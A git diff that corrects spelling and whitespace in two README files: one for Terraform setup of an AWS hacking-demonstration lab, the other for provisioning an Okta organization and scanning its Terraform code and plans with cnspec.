100644 --- a/hack-lab/windows-hack-environment/README.md +++ b/hack-lab/windows-hack-environment/README.md @@ -9,7 +9,7 @@ This folder contains Terraform automation code to provision the following: - **Windows 2016 DVWA** - This instance is provisioned for the demonstration of the Windows Hack and Printnightmare vulnerability/ DVWA App hack. (ami-0808d6a0d91e57fd3 in eu-central-1) -### Prerequsites +### Prerequisites - [AWS Account](https://aws.amazon.com/free/) - [AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html) - `~> aws-cli/2.4.28` @@ -38,7 +38,7 @@ Before provisioning set the following environment variables: - `TF_VAR_ssh_key_path` - Path to to local ssh key for connecting to Kali Linux instance. - `TF_VAR_publicIP` - IP address of your home network to be applied to the security group for the Kali Linux, Ubuntu and Windows instance. example: `1.1.1.1/32` -### Example configuration +### Example configuration Open a terminal and run the following commands: diff --git a/okta/okta-terraform-provisioning/README.md b/okta/okta-terraform-provisioning/README.md index 3fc0035..2ad0fb2 100644 --- a/okta/okta-terraform-provisioning/README.md +++ b/okta/okta-terraform-provisioning/README.md @@ -2,7 +2,7 @@ This repository contains example HashiCorp Terraform code for provisioning an Okta organization. -### Prerequsites +### Prerequisites To use try the code in this repository, you will need the following: @@ -12,7 +12,7 @@ To use try the code in this repository, you will need the following: ## Setup Okta Dev Account -If you do not already have an Okta development environment, sign-up for a free account at [developer.okta.com](https://developer.okta.com). +If you do not already have an Okta development environment, sign-up for a free account at [developer.okta.com](https://developer.okta.com). ### Okta HealthInsights @@ -22,11 +22,11 @@ Okta HealthInsights provides recommended security tasks to improve security for ### Create an Okta API token -To manage Okta with Terraform and scan Okta with cnspec, you will need an Okta API token. Visit [Create an API token](https://developer.okta.com/docs/guides/create-an-api-token/main/) to learn how to create an API token. +To manage Okta with Terraform and scan Okta with cnspec, you will need an Okta API token. Visit [Create an API token](https://developer.okta.com/docs/guides/create-an-api-token/main/) to learn how to create an API token. ## Fork and clone this repository -If you want to try this code, first thing you should do is Fork it, then clone it locally. +If you want to try this code, first thing you should do is fork it, then clone it locally. ### Configure Okta Provider for Terraform @@ -47,19 +47,19 @@ This repository is configured to use my own GCP GCS bucket for the Terraform bac ### Terraform Init -Once the backend is configured, cd into the `terraform` directory in this repo and run `terraform init` to download the modules and initialize the backend. +Once the backend is configured, cd into the `terraform` directory in this repo and run `terraform init` to download the modules and initialize the backend. ### Security scan Terraform HCL with cnspec (pre-plan) Run the following command from the root directory of this repository to scan the Terraform code in this repository before you apply any changes to your Okta environment: -```typscript +```typescript cnspec scan terraform ./terraform -f policies/okta-security.mql.yaml ``` ### Security scan Terraform Plan with cnspec (post-plan) -The policy in this repository also supports scanning of Terraform plan files which provides a deeper level of understanding of the configuration changes to be applied. +The policy in this repository also supports scanning of Terraform plan files which provides a deeper level of understanding of the configuration changes to be applied. #### Generate a Terraform plan.json to scan @@ -71,14 +71,6 @@ terraform show -json tfplan > tfplan.json #### Scan the Terraform tfplan.json -```typscript +```typescript cnspec scan terraform plan tfplan.json -f policies/okta-security.mql.yaml ``` - - - - - - - -